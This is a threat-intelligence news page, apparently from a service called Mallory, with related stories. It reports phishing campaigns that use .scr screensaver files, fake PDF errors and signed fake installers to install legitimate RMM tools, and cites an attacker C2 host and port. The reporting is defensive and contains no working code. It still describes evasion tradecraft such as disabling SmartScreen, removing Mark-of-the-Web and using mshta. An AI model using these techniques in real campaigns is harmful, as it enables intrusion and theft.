Spearphishing Campaigns Abuse PDF and Windows Screensaver Files to Install Legitimate RMM Tools
Threat actors have been observed using spearphishing lures and non-traditional attachment types—particularly Windows screensaver (.scr) executables—to trick users into running code that silently installs legitimate remote monitoring and management (RMM) agents (e.g., SimpleHelp). ReliaQuest research described business-themed filenames (e.g., InvoiceDetails.scr, ProjectSummary.scr) delivered via links hosted on legitimate cloud services (e.g., GoFile), with the .scr format helping bypass controls that don’t treat screensavers as executables. Once installed, the RMM tooling provides interactive remote access that can enable data theft, lateral movement, and follow-on payload deployment, including ransomware, while blending into normal IT administration traffic.
Separately, researchers also reported a spam operation using fake PDF attachments that display an error message and redirect victims to a lookalike Adobe Acrobat download flow, but instead installs trusted, digitally signed RMM software to establish persistent access. A different phishing campaign used a multi-stage PDF chain hosted on reputable infrastructure (e.g., Vercel Blob) to redirect victims to a credential-harvesting page and exfiltrate stolen data via a Telegram bot, emphasizing how attackers are increasingly abusing high-reputation cloud platforms and document-based lures to evade email and web filtering (including scenarios where the initial email contains no malicious link and can pass SPF/DKIM/DMARC checks).
Timeline
Feb 4, 2026
ReliaQuest publishes detection and mitigation guidance for .scr abuse
Alongside its reporting, ReliaQuest said it could not confidently attribute the campaign and recommended treating .scr files as executables, maintaining an allowlist for approved RMM tools, and blocking non-business file-hosting services at DNS or proxy layers. These recommendations were issued in response to the observed campaign abusing screensaver files and RMM software.
Feb 4, 2026
Attackers use .scr screensavers in phishing to deploy JWrapper RMM
ReliaQuest Threat Research reported a spear-phishing campaign in which business-themed emails lured victims to download Windows screensaver (.scr) files from consumer cloud storage. When executed, the files installed the legitimate JWrapper remote monitoring and management tool, giving attackers persistent access for follow-on activity such as data theft, lateral movement, and possible ransomware deployment.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Malware
Organizations
Sources
Related Stories
Phishing Campaigns Delivering Malware via Disguised, Signed Installers and Malicious Attachments
Security researchers reported active phishing activity targeting enterprise users by impersonating routine workplace workflows (e.g., meeting invites, invoices, and document notifications) to trick recipients into running malware. One campaign used executables masquerading as *Microsoft Teams*, *Zoom*, and *Adobe Acrobat Reader* installers (e.g., `msteams.exe`, `zoomworkspace.clientsetup.exe`, `adobereader.exe`, `invite.exe`) that appeared trustworthy because they were **digitally signed** with an Extended Validation (EV) certificate issued to **TrustConnect Software PTY LTD**. Microsoft Defender telemetry attributed the activity to an unknown threat actor and assessed the approach as a deliberate, multi-wave effort designed to bypass user suspicion and basic security controls. After execution, the signed malware deployed **remote monitoring and management (RMM)** tooling—reported examples include **ScreenConnect**, **Tactical RMM**, and **Mesh Agent**—to establish persistent remote access and enable follow-on actions across affected environments. Separately, reporting also highlighted phishing lures distributing **malicious ISO attachments** embedded in job application/resumé-themed emails, reinforcing that attackers continue to rely on socially engineered business processes (recruiting and HR workflows in particular) to deliver initial payloads and gain a foothold.
1 months ago
Phishing Campaigns Weaponize Legitimate RMM Tools for Remote Access and Credential Theft
Threat researchers reported multiple phishing-driven intrusions in which attackers impersonate trusted brands and agencies to trick victims into installing legitimate remote monitoring and management (RMM) software for persistent access. In **Operation DoppelBrand**, financially motivated actor **GS7** spoofed Fortune 500 financial and technology brands (including **Wells Fargo** and **USAA**) using more than **150** lookalike domains to harvest credentials and exfiltrate data via attacker-controlled **Telegram bots**; researchers also identified nearly **200** additional domains with short registration terms, automated SSL, wildcard DNS, and brand-specific subdomains supporting the campaign. Separately, Forcepoint X-Labs described a wave of emails impersonating the **U.S. Social Security Administration** that delivers an attached `.cmd` script to weaken Windows defenses and enable silent installation of **ConnectWise ScreenConnect**. The script checks/elevates privileges, disables **Windows SmartScreen** via registry changes, removes **Mark-of-the-Web**, and uses **Alternate Data Streams (ADS)** for stealth before installing an MSI and configuring ScreenConnect (via `System.config`) to beacon to an attacker-controlled server (reported as `dof-connecttop` on port `8041`). Both activity sets highlight a recurring tradecraft pattern: **brand impersonation + scripted defense evasion + abuse of legitimate RMM tooling** (e.g., *LogMeIn Resolve*, *ScreenConnect*) to gain remote control and facilitate follow-on theft or persistence.
1 months ago
Weaponized Document Lures Used to Deliver Malware and Remote Access
Multiple reports describe threat actors using *document-themed lures* to deliver malicious payloads while evading user scrutiny and defensive controls. ASEC-reported activity shows **weaponized PDF files** distributed via phishing (e.g., “Invoice,” “Payment”) that display a decoy image or a “Failed to load PDF document” error to push victims to click through to **fake Google Drive/Adobe pages**, ultimately installing legitimate **RMM tools** (e.g., *Syncro, SuperOps, NinjaOne, ConnectWise ScreenConnect*) signed with a valid certificate to blend in as administrative software rather than obvious malware. Separately, research on **APT36 / Transparent Tribe** details a targeted espionage operation against Indian government, academic, and strategic entities using spear-phishing ZIP attachments containing **oversized LNK files masquerading as PDFs**; execution chains leverage `mshta.exe` to retrieve remote HTA content, decrypt and reconstruct payloads in memory, and deploy a RAT (tracked as **ReadWriteRAT**) with capabilities including encrypted C2, remote command execution, screenshot capture, clipboard access, and data theft. Other items in the set cover unrelated threats—WordPress SEO cloaking that selectively serves malicious content to verified Googlebot IP ranges, a vendor blog overview of **Medusa** ransomware activity, and reporting on **CrazyHunter** ransomware impacting Taiwan healthcare—indicating the commonality here is *document/SEO deception techniques*, not a single unified incident.
1 months ago